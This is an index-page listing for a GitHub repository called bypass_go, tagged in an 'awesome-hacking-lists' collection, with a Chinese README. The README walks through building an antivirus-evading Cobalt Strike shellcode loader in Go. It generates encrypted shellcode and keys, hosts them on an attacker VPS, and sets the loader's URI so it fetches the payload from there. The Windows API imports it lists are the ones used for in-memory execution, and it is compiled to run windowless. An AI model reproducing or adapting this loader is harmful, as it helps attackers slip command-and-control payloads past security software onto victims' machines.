Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/fengziHK/bypass_go
bypass_go cs免杀
https://github.com/fengziHK/bypass_go
Last synced: about 1 month ago
JSON representation
bypass_go cs免杀
- Host: GitHub
- URL: https://github.com/fengziHK/bypass_go
- Owner: fengziHK
- Created: 2021-06-15T09:54:42.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-06-15T10:03:18.000Z (over 3 years ago)
- Last Synced: 2024-06-21T20:07:36.073Z (3 months ago)
- Language: Go
- Size: 1.95 KB
- Stars: 46
- Watchers: 3
- Forks: 10
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - fengziHK/bypass_go - bypass_go cs免杀 (Go)
README
1. CS加载Bypass_make.cna插件,生成shellcode和加密key1、key2:
"Attack" > "BypassShellCode"
2. 将得到的shellcode和key的值分别做加密:
process_shellcode.exe shellcode > code.txt
process_shellcode.exe key1 > k1.txt
process_shellcode.exe key2 > k2.txt
3. 得到的三个结果分别手动保存为文件放在vps上
code.txt
k1.txt
k2.txt
4. 修改shellcode_loader.go中的vps请求地址即可:
```
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
URI = "http://vps:80/"
)
```
6. 编译go文件:
go build -ldflags "-H windowsgui" shellcode_loader.go
7. 运行shellcode_loader.exe即可